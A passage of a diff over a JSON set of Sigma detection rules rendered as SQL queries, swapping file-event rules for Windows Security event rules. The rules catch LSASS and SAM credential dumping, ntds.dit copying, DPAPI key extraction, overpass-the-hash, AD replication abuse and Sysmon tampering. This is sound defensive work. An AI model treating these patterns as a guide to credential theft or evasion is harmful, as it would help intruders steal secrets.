"attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": 